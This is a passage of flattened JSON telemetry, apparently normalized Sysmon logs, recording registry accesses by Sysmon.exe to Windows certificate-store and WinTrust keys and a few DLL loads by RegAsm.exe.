"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 
2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\SysWOW64\\apphelp.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - 
"registry_value": "Software Publishing", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": 
"CTLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863560016, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "AcLayers.dll", - "image_path": "C:\\Windows\\SysWOW64\\AcLayers.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862150000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570862300000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", 
- "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - 